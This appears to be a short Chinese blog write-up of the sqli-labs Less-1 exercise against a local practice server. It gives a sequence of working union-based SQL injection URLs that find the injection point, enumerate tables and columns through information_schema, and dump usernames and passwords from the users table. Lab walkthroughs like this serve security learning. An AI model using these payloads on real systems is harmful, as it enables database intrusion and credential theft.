JZTXT
  • 首页
  • Ai
  • Java
  • Python
  • Android
  • Mysql
  • JavaScript
  • Html
  • CSS

sqli-lab less-1

发布时间 2023-10-10 16:17:25作者: dddon

尝试 http://127.0.0.1:88/Less-1/?id=1a
正常显示,判断为字符型注入

image

尝试union注入 http://127.0.0.1:88/Less-1/?id=1' union select 1,1,1%23 成功
image

查询表名 http://127.0.0.1:88/Less-1/?id=-1' union select 1,1,group_concat(table_name) from information_schema.tables where table_schema=database()%23

image

查询users中的列名 http://127.0.0.1:88/Less-1/?id=-1' union select 1,1,group_concat(column_name) from information_schema.columns where table_name='users'%23

image

union注入查询账密
http://127.0.0.1:88/Less-1/?id=-1' union select 1,1,group_concat(username,0x3a,password) from users %23

image

    本栏目推荐文章
  • upload-labs
  • devmapper: Thin Pool has 162394 free data blocks which is less than minimum required 163840 free data blocks
  • rCore_Lab3
  • MIT6.828 Lab1-1(分析boot.S文件)
  • mit6.828 - lab5笔记(上)
  • 记一次失败的cs144lab0尝试:d
  • 记一次_失败_的CS144 Lab0尝试
  • rCore_Lab1
  • rCore_Lab2
  • XV6 lab2 增加系统调用
版权声明:本网站为非赢利性站点,本网站所有内容均来源于互联网相关站点自动搜索采集信息,相关链接已经注明来源。
联系我们